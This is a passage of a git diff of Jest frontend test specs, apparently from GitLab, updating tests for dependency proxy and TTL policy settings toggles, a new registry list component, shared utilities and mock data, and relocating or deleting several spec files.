updateTtlPoliciesMutationResolver; const defaultProvide = { defaultExpanded: false, groupPath: 'foo_group_path', + groupDependencyProxyPath: 'group_dependency_proxy_path', }; localVue.use(VueApollo); const mountComponent = ({ provide = defaultProvide, - mutationResolver = jest.fn().mockResolvedValue(dependencyProxySettingMutationMock()), isLoading = false, + dependencyProxySettings = dependencyProxySettingsMock(), + dependencyProxyImageTtlPolicy = dependencyProxyImageTtlPolicyMock(), } = {}) => { - const requestHandlers = [[updateDependencyProxySettings, mutationResolver]]; + const requestHandlers = [ + [updateDependencyProxySettings, updateSettingsMutationResolver], + [updateDependencyProxyImageTtlGroupPolicy, updateTtlPoliciesMutationResolver], + ]; apolloProvider = createMockApollo(requestHandlers); - wrapper = shallowMount(component, { + wrapper = shallowMountExtended(component, { localVue, 
apolloProvider, provide, propsData: { - dependencyProxySettings: dependencyProxySettings(), + dependencyProxySettings, + dependencyProxyImageTtlPolicy, isLoading, }, stubs: { GlSprintf, + GlToggle, SettingsBlock, }, }); }; + beforeEach(() => { + updateSettingsMutationResolver = jest + .fn() + .mockResolvedValue(dependencyProxySettingMutationMock()); + updateTtlPoliciesMutationResolver = jest + .fn() + .mockResolvedValue(dependencyProxyUpdateTllPolicyMutationMock()); + }); + afterEach(() => { wrapper.destroy(); }); const findSettingsBlock = () => wrapper.findComponent(SettingsBlock); - const findDescription = () => wrapper.find('[data-testid="description"'); - const findLink = () => wrapper.findComponent(GlLink); - const findToggle = () => wrapper.findComponent(GlToggle); + const findSettingsTitles = () => wrapper.findComponent(SettingsTitles); + const findDescription = () => wrapper.findByTestId('description'); + const findDescriptionLink = () => wrapper.findByTestId('description-link'); + const findEnableProxyToggle = () => wrapper.findByTestId('dependency-proxy-setting-toggle'); + const findEnableTtlPoliciesToggle = () => + wrapper.findByTestId('dependency-proxy-ttl-policies-toggle'); + const findToggleHelpLink = () => wrapper.findByTestId('toggle-help-link'); const fillApolloCache = () => { apolloProvider.defaultClient.cache.writeQuery({ @@ -81,10 +111,6 @@ describe('DependencyProxySettings', () => { }); }; - const emitSettingsUpdate = (value = false) => { - findToggle().vm.$emit('change', value); - }; - it('renders a settings block', () => { mountComponent(); @@ -112,19 +138,93 @@ describe('DependencyProxySettings', () => { it('has the correct link', () => { mountComponent(); - expect(findLink().attributes()).toMatchObject({ + expect(findDescriptionLink().attributes()).toMatchObject({ href: DEPENDENCY_PROXY_DOCS_PATH, }); - expect(findLink().text()).toBe('Learn more'); + expect(findDescriptionLink().text()).toBe('Learn more'); + }); + + describe('enable 
toggle', () => { + it('exists', () => { + mountComponent(); + + expect(findEnableProxyToggle().props()).toMatchObject({ + label: component.i18n.enabledProxyLabel, + }); + }); + + describe('when enabled', () => { + beforeEach(() => { + mountComponent(); + }); + + it('has the help prop correctly set', () => { + expect(findEnableProxyToggle().props()).toMatchObject({ + help: component.i18n.enabledProxyHelpText, + }); + }); + + it('has help text with a link', () => { + expect(findEnableProxyToggle().text()).toContain( + 'To see the image prefix and what is in the cache, visit the Dependency Proxy', + ); + expect(findToggleHelpLink().attributes()).toMatchObject({ + href: defaultProvide.groupDependencyProxyPath, + }); + }); + }); + + describe('when disabled', () => { + beforeEach(() => { + mountComponent({ + dependencyProxySettings: dependencyProxySettingsMock({ enabled: false }), + }); + }); + + it('has the help prop set to empty', () => { + expect(findEnableProxyToggle().props()).toMatchObject({ + help: '', + }); + }); + + it('the help text is not visible', () => { + expect(findToggleHelpLink().exists()).toBe(false); + }); + }); + }); + + describe('storage settings', () => { + it('the component has the settings title', () => { + mountComponent(); + + expect(findSettingsTitles().props()).toMatchObject({ + title: component.i18n.storageSettingsTitle, + }); + }); + + describe('enable proxy ttl policies', () => { + it('exists', () => { + mountComponent(); + + expect(findEnableTtlPoliciesToggle().props()).toMatchObject({ + label: component.i18n.ttlPolicyEnabledLabel, + help: component.i18n.ttlPolicyEnabledHelpText, + }); + }); + }); }); - describe('settings update', () => { + describe.each` + toggleName | toggleFinder | localErrorMock | optimisticResponse + ${'enable proxy'} | ${findEnableProxyToggle} | ${dependencyProxySettingMutationMock} | ${updateGroupDependencyProxySettingsOptimisticResponse} + ${'enable ttl policies'} | ${findEnableTtlPoliciesToggle} | 
${dependencyProxyUpdateTllPolicyMutationMock} | ${updateDependencyProxyImageTtlGroupPolicyOptimisticResponse} + `('$toggleName settings update ', ({ optimisticResponse, toggleFinder, localErrorMock }) => { describe('success state', () => { it('emits a success event', async () => { mountComponent(); fillApolloCache(); - emitSettingsUpdate(); + toggleFinder().vm.$emit('change', false); await waitForPromises(); @@ -136,26 +236,28 @@ describe('DependencyProxySettings', () => { fillApolloCache(); - expect(findToggle().props('value')).toBe(true); + expect(toggleFinder().props('value')).toBe(true); - emitSettingsUpdate(); + toggleFinder().vm.$emit('change', false); - expect(updateGroupDependencyProxySettingsOptimisticResponse).toHaveBeenCalledWith({ - enabled: false, - }); + expect(optimisticResponse).toHaveBeenCalledWith( + expect.objectContaining({ + enabled: false, + }), + ); }); }); describe('errors', () => { it('mutation payload with root level errors', async () => { - const mutationResolver = jest - .fn() - .mockResolvedValue(dependencyProxySettingMutationErrorMock); - mountComponent({ mutationResolver }); + updateSettingsMutationResolver = jest.fn().mockResolvedValue(mutationErrorMock); + updateTtlPoliciesMutationResolver = jest.fn().mockResolvedValue(mutationErrorMock); + + mountComponent(); fillApolloCache(); - emitSettingsUpdate(); + toggleFinder().vm.$emit('change', false); await waitForPromises(); @@ -163,14 +265,16 @@ describe('DependencyProxySettings', () => { }); it.each` - type | mutationResolver - ${'local'} | ${jest.fn().mockResolvedValue(dependencyProxySettingMutationMock({ errors: ['foo'] }))} + type | mutationResolverMock + ${'local'} | ${jest.fn().mockResolvedValue(localErrorMock({ errors: ['foo'] }))} ${'network'} | ${jest.fn().mockRejectedValue()} - `('mutation payload with $type error', async ({ mutationResolver }) => { - mountComponent({ mutationResolver }); + `('mutation payload with $type error', async ({ mutationResolverMock }) => { + 
updateSettingsMutationResolver = mutationResolverMock; + updateTtlPoliciesMutationResolver = mutationResolverMock; + mountComponent(); fillApolloCache(); - emitSettingsUpdate(); + toggleFinder().vm.$emit('change', false); await waitForPromises(); @@ -180,10 +284,16 @@ describe('DependencyProxySettings', () => { }); describe('when isLoading is true', () => { - it('disables enable toggle', () => { + it('disables enable proxy toggle', () => { + mountComponent({ isLoading: true }); + + expect(findEnableProxyToggle().props('disabled')).toBe(true); + }); + + it('disables enable ttl policies toggle', () => { mountComponent({ isLoading: true }); - expect(findToggle().props('disabled')).toBe(true); + expect(findEnableTtlPoliciesToggle().props('disabled')).toBe(true); }); }); }); diff --git a/spec/frontend/packages_and_registries/settings/group/components/group_settings_app_spec.js b/spec/frontend/packages_and_registries/settings/group/components/group_settings_app_spec.js index e4d62bc6a6e..933dac7f5a8 100644 --- a/spec/frontend/packages_and_registries/settings/group/components/group_settings_app_spec.js +++ b/spec/frontend/packages_and_registries/settings/group/components/group_settings_app_spec.js @@ -10,7 +10,12 @@ import DependencyProxySettings from '~/packages_and_registries/settings/group/co import component from '~/packages_and_registries/settings/group/components/group_settings_app.vue'; import getGroupPackagesSettingsQuery from '~/packages_and_registries/settings/group/graphql/queries/get_group_packages_settings.query.graphql'; -import { groupPackageSettingsMock, packageSettings, dependencyProxySettings } from '../mock_data'; +import { + groupPackageSettingsMock, + packageSettings, + dependencyProxySettings, + dependencyProxyImageTtlPolicy, +} from '../mock_data'; jest.mock('~/flash'); @@ -66,11 +71,17 @@ describe('Group Settings App', () => { await nextTick(); }; + const packageSettingsProps = { packageSettings: packageSettings() }; + const dependencyProxyProps = 
{ + dependencyProxySettings: dependencyProxySettings(), + dependencyProxyImageTtlPolicy: dependencyProxyImageTtlPolicy(), + }; + describe.each` - finder | entityProp | entityValue | successMessage | errorMessage - ${findPackageSettings} | ${'packageSettings'} | ${packageSettings()} | ${'Settings saved successfully'} | ${'An error occurred while saving the settings'} - ${findDependencyProxySettings} | ${'dependencyProxySettings'} | ${dependencyProxySettings()} | ${'Setting saved successfully'} | ${'An error occurred while saving the setting'} - `('settings blocks', ({ finder, entityProp, entityValue, successMessage, errorMessage }) => { + finder | entitySpecificProps | successMessage | errorMessage + ${findPackageSettings} | ${packageSettingsProps} | ${'Settings saved successfully'} | ${'An error occurred while saving the settings'} + ${findDependencyProxySettings} | ${dependencyProxyProps} | ${'Setting saved successfully'} | ${'An error occurred while saving the setting'} + `('settings blocks', ({ finder, entitySpecificProps, successMessage, errorMessage }) => { beforeEach(() => { mountComponent(); return waitForApolloQueryAndRender(); @@ -83,7 +94,7 @@ describe('Group Settings App', () => { it('binds the correctProps', () => { expect(finder().props()).toMatchObject({ isLoading: false, - [entityProp]: entityValue, + ...entitySpecificProps, }); }); diff --git a/spec/frontend/packages_and_registries/settings/group/components/settings_titles_spec.js b/spec/frontend/packages_and_registries/settings/group/components/settings_titles_spec.js index a61edad8685..fcfad4b42b8 100644 --- a/spec/frontend/packages_and_registries/settings/group/components/settings_titles_spec.js +++ b/spec/frontend/packages_and_registries/settings/group/components/settings_titles_spec.js @@ -4,15 +4,19 @@ import SettingsTitles from '~/packages_and_registries/settings/group/components/ describe('settings_titles', () => { let wrapper; - const mountComponent = () => { + const defaultProps = { + 
title: 'foo', + subTitle: 'bar', + }; + + const mountComponent = (propsData = defaultProps) => { wrapper = shallowMount(SettingsTitles, { - propsData: { - title: 'foo', - subTitle: 'bar', - }, + propsData, }); }; + const findSubTitle = () => wrapper.find('p'); + afterEach(() => { wrapper.destroy(); }); @@ -22,4 +26,10 @@ describe('settings_titles', () => { expect(wrapper.element).toMatchSnapshot(); }); + + it('does not render the subtitle paragraph when no subtitle is passed', () => { + mountComponent({ title: defaultProps.title }); + + expect(findSubTitle().exists()).toBe(false); + }); }); diff --git a/spec/frontend/packages_and_registries/settings/group/graphl/utils/cache_update_spec.js b/spec/frontend/packages_and_registries/settings/group/graphl/utils/cache_update_spec.js index 9d8504a1124..a5b571a0241 100644 --- a/spec/frontend/packages_and_registries/settings/group/graphl/utils/cache_update_spec.js +++ b/spec/frontend/packages_and_registries/settings/group/graphl/utils/cache_update_spec.js @@ -17,6 +17,13 @@ describe('Package and Registries settings group cache updates', () => { }, }; + const updateDependencyProxyImageTtlGroupPolicyPayload = { + dependencyProxyImageTtlPolicy: { + enabled: false, + ttl: 45, + }, + }; + const cacheMock = { group: { packageSettings: { @@ -26,6 +33,10 @@ describe('Package and Registries settings group cache updates', () => { dependencyProxySetting: { enabled: true, }, + dependencyProxyImageTtlPolicy: { + enabled: true, + ttl: 45, + }, }, }; @@ -42,15 +53,26 @@ describe('Package and Registries settings group cache updates', () => { }); describe.each` - updateNamespacePackageSettings | updateDependencyProxySettings - ${updateNamespacePackageSettingsPayload} | ${updateDependencyProxySettingsPayload} - ${undefined} | ${updateDependencyProxySettingsPayload} - ${updateNamespacePackageSettingsPayload} | ${undefined} - ${undefined} | ${undefined} + updateNamespacePackageSettings | updateDependencyProxySettings | 
updateDependencyProxyImageTtlGroupPolicy + ${updateNamespacePackageSettingsPayload} | ${updateDependencyProxySettingsPayload} | ${undefined} + ${undefined} | ${updateDependencyProxySettingsPayload} | ${undefined} + ${updateNamespacePackageSettingsPayload} | ${undefined} | ${undefined} + ${undefined} | ${undefined} | ${updateDependencyProxyImageTtlGroupPolicyPayload} + ${undefined} | ${undefined} | ${undefined} `( 'updateGroupPackageSettings', - ({ updateNamespacePackageSettings, updateDependencyProxySettings }) => { - const payload = { data: { updateNamespacePackageSettings, updateDependencyProxySettings } }; + ({ + updateNamespacePackageSettings, + updateDependencyProxySettings, + updateDependencyProxyImageTtlGroupPolicy, + }) => { + const payload = { + data: { + updateNamespacePackageSettings, + updateDependencyProxySettings, + updateDependencyProxyImageTtlGroupPolicy, + }, + }; it('calls readQuery', () => { updateGroupPackageSettings('foo')(client, payload); expect(client.readQuery).toHaveBeenCalledWith(queryAndVariables); @@ -65,6 +87,7 @@ describe('Package and Registries settings group cache updates', () => { ...cacheMock.group, ...payload.data.updateNamespacePackageSettings, ...payload.data.updateDependencyProxySettings, + ...payload.data.updateDependencyProxyImageTtlGroupPolicy, }, }, }); diff --git a/spec/frontend/packages_and_registries/settings/group/graphl/utils/optimistic_responses_spec.js b/spec/frontend/packages_and_registries/settings/group/graphl/utils/optimistic_responses_spec.js index debeb9aa89c..b4efda3e7b2 100644 --- a/spec/frontend/packages_and_registries/settings/group/graphl/utils/optimistic_responses_spec.js +++ b/spec/frontend/packages_and_registries/settings/group/graphl/utils/optimistic_responses_spec.js @@ -1,6 +1,7 @@ import { updateGroupPackagesSettingsOptimisticResponse, updateGroupDependencyProxySettingsOptimisticResponse, + updateDependencyProxyImageTtlGroupPolicyOptimisticResponse, } from 
'~/packages_and_registries/settings/group/graphql/utils/optimistic_responses'; describe('Optimistic responses', () => { @@ -38,4 +39,22 @@ describe('Optimistic responses', () => { `); }); }); + + describe('updateDependencyProxyImageTtlGroupPolicyOptimisticResponse', () => { + it('returns the correct structure', () => { + expect(updateDependencyProxyImageTtlGroupPolicyOptimisticResponse({ foo: 'bar' })) + .toMatchInlineSnapshot(` + Object { + "__typename": "Mutation", + "updateDependencyProxyImageTtlGroupPolicy": Object { + "__typename": "UpdateDependencyProxyImageTtlGroupPolicyPayload", + "dependencyProxyImageTtlPolicy": Object { + "foo": "bar", + }, + "errors": Array [], + }, + } + `); + }); + }); }); diff --git a/spec/frontend/packages_and_registries/settings/group/mock_data.js b/spec/frontend/packages_and_registries/settings/group/mock_data.js index 81ba0795b7d..d53446de910 100644 --- a/spec/frontend/packages_and_registries/settings/group/mock_data.js +++ b/spec/frontend/packages_and_registries/settings/group/mock_data.js @@ -5,16 +5,25 @@ export const packageSettings = () => ({ genericDuplicateExceptionRegex: '', }); -export const dependencyProxySettings = () => ({ +export const dependencyProxySettings = (extend) => ({ enabled: true, + ...extend, +}); + +export const dependencyProxyImageTtlPolicy = (extend) => ({ + ttl: 90, + enabled: true, + ...extend, }); export const groupPackageSettingsMock = { data: { group: { + id: '1', fullPath: 'foo_group_path', packageSettings: packageSettings(), dependencyProxySetting: dependencyProxySettings(), + dependencyProxyImageTtlPolicy: dependencyProxyImageTtlPolicy(), }, }, }; @@ -44,6 +53,16 @@ export const dependencyProxySettingMutationMock = (override) => ({ }, }); +export const dependencyProxyUpdateTllPolicyMutationMock = (override) => ({ + data: { + updateDependencyProxyImageTtlGroupPolicy: { + dependencyProxyImageTtlPolicy: dependencyProxyImageTtlPolicy(), + errors: [], + ...override, + }, + }, +}); + export const 
groupPackageSettingsMutationErrorMock = { errors: [ { @@ -68,7 +87,8 @@ export const groupPackageSettingsMutationErrorMock = { }, ], }; -export const dependencyProxySettingMutationErrorMock = { + +export const mutationErrorMock = { errors: [ { message: 'Some error', diff --git a/spec/frontend/packages_and_registries/settings/project/settings/mock_data.js b/spec/frontend/packages_and_registries/settings/project/settings/mock_data.js index 9778f409010..a56bb75f8ed 100644 --- a/spec/frontend/packages_and_registries/settings/project/settings/mock_data.js +++ b/spec/frontend/packages_and_registries/settings/project/settings/mock_data.js @@ -11,6 +11,7 @@ export const containerExpirationPolicyData = () => ({ export const expirationPolicyPayload = (override) => ({ data: { project: { + id: '1', containerExpirationPolicy: { ...containerExpirationPolicyData(), ...override, diff --git a/spec/frontend/packages/shared/components/__snapshots__/publish_method_spec.js.snap b/spec/frontend/packages_and_registries/shared/__snapshots__/publish_method_spec.js.snap index acdf7c49ebd..5f243799bae 100644 --- a/spec/frontend/packages/shared/components/__snapshots__/publish_method_spec.js.snap +++ b/spec/frontend/packages_and_registries/shared/__snapshots__/publish_method_spec.js.snap @@ -37,6 +37,7 @@ exports[`publish_method renders 1`] = ` text="sha-baz" title="Copy commit SHA" tooltipplacement="top" + variant="default" /> </div> `; diff --git a/spec/frontend/packages_and_registries/shared/components/registry_list_spec.js b/spec/frontend/packages_and_registries/shared/components/registry_list_spec.js new file mode 100644 index 00000000000..aaca58d21bb --- /dev/null +++ b/spec/frontend/packages_and_registries/shared/components/registry_list_spec.js @@ -0,0 +1,199 @@ +import { GlButton, GlFormCheckbox, GlKeysetPagination } from '@gitlab/ui'; +import { nextTick } from 'vue'; +import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; +import component from 
'~/packages_and_registries/shared/components/registry_list.vue'; + +describe('Registry List', () => { + let wrapper; + + const items = [{ id: 'a' }, { id: 'b' }]; + const defaultPropsData = { + title: 'test_title', + items, + }; + + const rowScopedSlot = ` + <div data-testid="scoped-slot"> + <button @click="props.selectItem(props.item)">Select</button> + <span>{{props.first}}</span> + <p>{{props.isSelected(props.item)}}</p> + </div>`; + + const mountComponent = ({ propsData = defaultPropsData } = {}) => { + wrapper = shallowMountExtended(component, { + propsData, + scopedSlots: { + default: rowScopedSlot, + }, + }); + }; + + const findSelectAll = () => wrapper.findComponent(GlFormCheckbox); + const findDeleteSelected = () => wrapper.findComponent(GlButton); + const findPagination = () => wrapper.findComponent(GlKeysetPagination); + const findScopedSlots = () => wrapper.findAllByTestId('scoped-slot'); + const findScopedSlotSelectButton = (index) => findScopedSlots().at(index).find('button'); + const findScopedSlotFirstValue = (index) => findScopedSlots().at(index).find('span'); + const findScopedSlotIsSelectedValue = (index) => findScopedSlots().at(index).find('p'); + + afterEach(() => { + wrapper.destroy(); + }); + + describe('header', () => { + it('renders the title passed in the prop', () => { + mountComponent(); + + expect(wrapper.text()).toContain(defaultPropsData.title); + }); + + describe('select all checkbox', () => { + beforeEach(() => { + mountComponent(); + }); + + it('exists', () => { + expect(findSelectAll().exists()).toBe(true); + }); + + it('select and unselect all', async () => { + // no row is not selected + items.forEach((item, index) => { + expect(findScopedSlotIsSelectedValue(index).text()).toBe(''); + }); + + // simulate selection + findSelectAll().vm.$emit('input', true); + await nextTick(); + + // all rows selected + items.forEach((item, index) => { + expect(findScopedSlotIsSelectedValue(index).text()).toBe('true'); + }); + + // simulate 
de-selection + findSelectAll().vm.$emit('input', ''); + await nextTick(); + + // no row is not selected + items.forEach((item, index) => { + expect(findScopedSlotIsSelectedValue(index).text()).toBe(''); + }); + }); + }); + + describe('delete button', () => { + it('has the correct text', () => { + mountComponent(); + + expect(findDeleteSelected().text()).toBe(component.i18n.deleteSelected); + }); + + it('is hidden when hiddenDelete is true', () => { + mountComponent({ propsData: { ...defaultPropsData, hiddenDelete: true } }); + + expect(findDeleteSelected().exists()).toBe(false); + }); + + it('is disabled when isLoading is true', () => { + mountComponent({ propsData: { ...defaultPropsData, isLoading: true } }); + + expect(findDeleteSelected().props('disabled')).toBe(true); + }); + + it('is disabled when no row is selected', async () => { + mountComponent(); + + expect(findDeleteSelected().props('disabled')).toBe(true); + + await findScopedSlotSelectButton(0).trigger('click'); + + expect(findDeleteSelected().props('disabled')).toBe(false); + }); + + it('on click emits the delete event with the selected rows', async () => { + mountComponent(); + + await findScopedSlotSelectButton(0).trigger('click'); + + findDeleteSelected().vm.$emit('click'); + + expect(wrapper.emitted('delete')).toEqual([[[items[0]]]]); + }); + }); + }); + + describe('main area', () => { + beforeEach(() => { + mountComponent(); + }); + + it('renders scopedSlots based on the items props', () => { + expect(findScopedSlots()).toHaveLength(items.length); + }); + + it('populates the scope of the slot correctly', async () => { + expect(findScopedSlots().at(0).exists()).toBe(true); + + // it's the first slot + expect(findScopedSlotFirstValue(0).text()).toBe('true'); + + // item is not selected, falsy is translated to empty string + expect(findScopedSlotIsSelectedValue(0).text()).toBe(''); + + // find the button with the bound function + await findScopedSlotSelectButton(0).trigger('click'); + + // the item 
is selected + expect(findScopedSlotIsSelectedValue(0).text()).toBe('true'); + }); + }); + + describe('footer', () => { + let pagination; + + beforeEach(() => { + pagination = { hasPreviousPage: false, hasNextPage: true }; + }); + + it('has a pagination', () => { + mountComponent({ + propsData: { ...defaultPropsData, pagination }, + }); + + expect(findPagination().props()).toMatchObject(pagination); + }); + + it.each` + hasPreviousPage | hasNextPage | visible + ${true} | ${true} | ${true} + ${true} | ${false} | ${true} + ${false} | ${true} | ${true} + ${false} | ${false} | ${false} + `( + 'when hasPreviousPage is $hasPreviousPage and hasNextPage is $hasNextPage is $visible that the pagination is shown', + ({ hasPreviousPage, hasNextPage, visible }) => { + pagination = { hasPreviousPage, hasNextPage }; + mountComponent({ + propsData: { ...defaultPropsData, pagination }, + }); + + expect(findPagination().exists()).toBe(visible); + }, + ); + + it('pagination emits the correct events', () => { + mountComponent({ + propsData: { ...defaultPropsData, pagination }, + }); + + findPagination().vm.$emit('prev'); + + expect(wrapper.emitted('prev-page')).toEqual([[]]); + + findPagination().vm.$emit('next'); + + expect(wrapper.emitted('next-page')).toEqual([[]]); + }); + }); +}); diff --git a/spec/frontend/packages/shared/components/package_icon_and_name_spec.js b/spec/frontend/packages_and_registries/shared/package_icon_and_name_spec.js index c96a570a29c..d6d1970cb12 100644 --- a/spec/frontend/packages/shared/components/package_icon_and_name_spec.js +++ b/spec/frontend/packages_and_registries/shared/package_icon_and_name_spec.js @@ -1,6 +1,6 @@ import { GlIcon } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; -import PackageIconAndName from '~/packages/shared/components/package_icon_and_name.vue'; +import PackageIconAndName from '~/packages_and_registries/shared/components/package_icon_and_name.vue'; describe('PackageIconAndName', () => { let wrapper; diff 
--git a/spec/frontend/packages/shared/components/package_path_spec.js b/spec/frontend/packages_and_registries/shared/package_path_spec.js index edbdd55c1d7..93425d4f399 100644 --- a/spec/frontend/packages/shared/components/package_path_spec.js +++ b/spec/frontend/packages_and_registries/shared/package_path_spec.js @@ -1,6 +1,6 @@ import { shallowMount } from '@vue/test-utils'; import { createMockDirective, getBinding } from 'helpers/vue_mock_directive'; -import PackagePath from '~/packages/shared/components/package_path.vue'; +import PackagePath from '~/packages_and_registries/shared/components/package_path.vue'; describe('PackagePath', () => { let wrapper; diff --git a/spec/frontend/packages/shared/components/package_tags_spec.js b/spec/frontend/packages_and_registries/shared/package_tags_spec.js index d26e4e76b87..33e96c0775e 100644 --- a/spec/frontend/packages/shared/components/package_tags_spec.js +++ b/spec/frontend/packages_and_registries/shared/package_tags_spec.js @@ -1,6 +1,6 @@ import { mount } from '@vue/test-utils'; -import PackageTags from '~/packages/shared/components/package_tags.vue'; -import { mockTags } from '../../mock_data'; +import PackageTags from '~/packages_and_registries/shared/components/package_tags.vue'; +import { mockTags } from 'jest/packages_and_registries/infrastructure_registry/components/mock_data'; describe('PackageTags', () => { let wrapper; diff --git a/spec/frontend/packages/shared/components/packages_list_loader_spec.js b/spec/frontend/packages_and_registries/shared/packages_list_loader_spec.js index 4ff01068f92..0005162e0bb 100644 --- a/spec/frontend/packages/shared/components/packages_list_loader_spec.js +++ b/spec/frontend/packages_and_registries/shared/packages_list_loader_spec.js @@ -1,5 +1,5 @@ import { mount } from '@vue/test-utils'; -import PackagesListLoader from '~/packages/shared/components/packages_list_loader.vue'; +import PackagesListLoader from 
'~/packages_and_registries/shared/components/packages_list_loader.vue'; describe('PackagesListLoader', () => { let wrapper; diff --git a/spec/frontend/packages/shared/components/publish_method_spec.js b/spec/frontend/packages_and_registries/shared/publish_method_spec.js index 6014774990c..fa8f8f7641a 100644 --- a/spec/frontend/packages/shared/components/publish_method_spec.js +++ b/spec/frontend/packages_and_registries/shared/publish_method_spec.js @@ -1,6 +1,6 @@ import { shallowMount } from '@vue/test-utils'; -import PublishMethod from '~/packages/shared/components/publish_method.vue'; -import { packageList } from '../../mock_data'; +import PublishMethod from '~/packages_and_registries/shared/components/publish_method.vue'; +import { packageList } from 'jest/packages_and_registries/infrastructure_registry/components/mock_data'; describe('publish_method', () => { let wrapper; diff --git a/spec/frontend/packages_and_registries/shared/utils_spec.js b/spec/frontend/packages_and_registries/shared/utils_spec.js index bbc8791ca21..962cb2257ce 100644 --- a/spec/frontend/packages_and_registries/shared/utils_spec.js +++ b/spec/frontend/packages_and_registries/shared/utils_spec.js @@ -4,8 +4,12 @@ import { keyValueToFilterToken, searchArrayToFilterTokens, extractFilterAndSorting, + beautifyPath, + getCommitLink, } from '~/packages_and_registries/shared/utils'; +import { packageList } from 'jest/packages_and_registries/infrastructure_registry/components/mock_data'; + describe('Packages And Registries shared utils', () => { describe('getQueryParams', () => { it('returns an object from a query string, with arrays', () => { @@ -56,4 +60,30 @@ describe('Packages And Registries shared utils', () => { }, ); }); + + describe('beautifyPath', () => { + it('returns a string with spaces around /', () => { + expect(beautifyPath('foo/bar')).toBe('foo / bar'); + }); + it('does not fail for empty string', () => { + expect(beautifyPath()).toBe(''); + }); + }); + + describe('getCommitLink', 
() => { + it('returns a relative link when isGroup is false', () => { + const link = getCommitLink(packageList[0], false); + + expect(link).toContain('../commit'); + }); + + describe('when isGroup is true', () => { + it('returns an absolute link matching project path', () => { + const mavenPackage = packageList[0]; + const link = getCommitLink(mavenPackage, true); + + expect(link).toContain(`/${mavenPackage.project_path}/commit`); + }); + }); + }); }); diff --git a/spec/frontend/pages/dashboard/projects/index/components/customize_homepage_banner_spec.js b/spec/frontend/pages/dashboard/projects/index/components/customize_homepage_banner_spec.js deleted file mode 100644 index f84800d8266..00000000000 --- a/spec/frontend/pages/dashboard/projects/index/components/customize_homepage_banner_spec.js +++ /dev/null @@ -1,108 +0,0 @@ -import { GlBanner } from '@gitlab/ui'; -import { shallowMount } from '@vue/test-utils'; -import MockAdapter from 'axios-mock-adapter'; -import { mockTracking, unmockTracking, triggerEvent } from 'helpers/tracking_helper'; -import axios from '~/lib/utils/axios_utils'; -import CustomizeHomepageBanner from '~/pages/dashboard/projects/index/components/customize_homepage_banner.vue'; - -const svgPath = '/illustrations/background'; -const provide = { - svgPath, - preferencesBehaviorPath: 'some/behavior/path', - calloutsPath: 'call/out/path', - calloutsFeatureId: 'some-feature-id', - trackLabel: 'home_page', -}; - -const createComponent = () => { - return shallowMount(CustomizeHomepageBanner, { provide, stubs: { GlBanner } }); -}; - -describe('CustomizeHomepageBanner', () => { - let trackingSpy; - let mockAxios; - let wrapper; - - beforeEach(() => { - mockAxios = new MockAdapter(axios); - document.body.dataset.page = 'some:page'; - trackingSpy = mockTracking('_category_', undefined, jest.spyOn); - wrapper = createComponent(); - }); - - afterEach(() => { - wrapper.destroy(); - wrapper = null; - mockAxios.restore(); - unmockTracking(); - }); - - 
it('should render the banner when not dismissed', () => { - expect(wrapper.find(GlBanner).exists()).toBe(true); - }); - - it('should close the banner when dismiss is clicked', async () => { - mockAxios.onPost(provide.calloutsPath).replyOnce(200); - expect(wrapper.find(GlBanner).exists()).toBe(true); - wrapper.find(GlBanner).vm.$emit('close'); - - await wrapper.vm.$nextTick(); - expect(wrapper.find(GlBanner).exists()).toBe(false); - }); - - it('includes the body text from options', () => { - expect(wrapper.html()).toContain(wrapper.vm.$options.i18n.body); - }); - - describe('tracking', () => { - const preferencesTrackingEvent = 'click_go_to_preferences'; - const mockTrackingOnWrapper = () => { - unmockTracking(); - trackingSpy = mockTracking('_category_', wrapper.element, jest.spyOn); - }; - - it('sets the needed data attributes for tracking button', async () => { - await wrapper.vm.$nextTick(); - const button = wrapper.find(`[href='${wrapper.vm.preferencesBehaviorPath}']`); - - expect(button.attributes('data-track-action')).toEqual(preferencesTrackingEvent); - expect(button.attributes('data-track-label')).toEqual(provide.trackLabel); - }); - - it('sends a tracking event when the banner is shown', () => { - const trackCategory = undefined; - const trackEvent = 'show_home_page_banner'; - - expect(trackingSpy).toHaveBeenCalledWith(trackCategory, trackEvent, { - label: provide.trackLabel, - }); - }); - - it('sends a tracking event when the banner is dismissed', async () => { - mockTrackingOnWrapper(); - mockAxios.onPost(provide.calloutsPath).replyOnce(200); - const trackCategory = undefined; - const trackEvent = 'click_dismiss'; - - wrapper.find(GlBanner).vm.$emit('close'); - - await wrapper.vm.$nextTick(); - expect(trackingSpy).toHaveBeenCalledWith(trackCategory, trackEvent, { - label: provide.trackLabel, - }); - }); - - it('sends a tracking event when the button is clicked', async () => { - mockTrackingOnWrapper(); - 
mockAxios.onPost(provide.calloutsPath).replyOnce(200); - const button = wrapper.find(`[href='${wrapper.vm.preferencesBehaviorPath}']`); - - triggerEvent(button.element); - - await wrapper.vm.$nextTick(); - expect(trackingSpy).toHaveBeenCalledWith('_category_', preferencesTrackingEvent, { - label: provide.trackLabel, - }); - }); - }); -}); diff --git a/spec/frontend/pages/import/bulk_imports/history/components/bulk_imports_history_app_spec.js b/spec/frontend/pages/import/bulk_imports/history/components/bulk_imports_history_app_spec.js index d6b394a42c6..6fb03fa28fe 100644 --- a/spec/frontend/pages/import/bulk_imports/history/components/bulk_imports_history_app_spec.js +++ b/spec/frontend/pages/import/bulk_imports/history/components/bulk_imports_history_app_spec.js @@ -2,7 +2,7 @@ import { GlEmptyState, GlLoadingIcon, GlTable } from '@gitlab/ui'; import { mount, shallowMount } from '@vue/test-utils'; import MockAdapter from 'axios-mock-adapter'; import axios from '~/lib/utils/axios_utils'; -import PaginationBar from '~/import_entities/components/pagination_bar.vue'; +import PaginationBar from '~/vue_shared/components/pagination_bar/pagination_bar.vue'; import BulkImportsHistoryApp from '~/pages/import/bulk_imports/history/components/bulk_imports_history_app.vue'; import { extendedWrapper } from 'helpers/vue_test_utils_helper'; diff --git a/spec/frontend/pages/projects/learn_gitlab/components/__snapshots__/learn_gitlab_spec.js.snap b/spec/frontend/pages/projects/learn_gitlab/components/__snapshots__/learn_gitlab_spec.js.snap index 3e371a8765f..1586aded6e6 100644 --- a/spec/frontend/pages/projects/learn_gitlab/components/__snapshots__/learn_gitlab_spec.js.snap +++ b/spec/frontend/pages/projects/learn_gitlab/components/__snapshots__/learn_gitlab_spec.js.snap @@ -2,6 +2,8 @@ exports[`Learn GitLab renders correctly 1`] = ` <div> + <!----> + <div class="row" > @@ -131,66 +133,60 @@ exports[`Learn GitLab renders correctly 1`] = ` <div 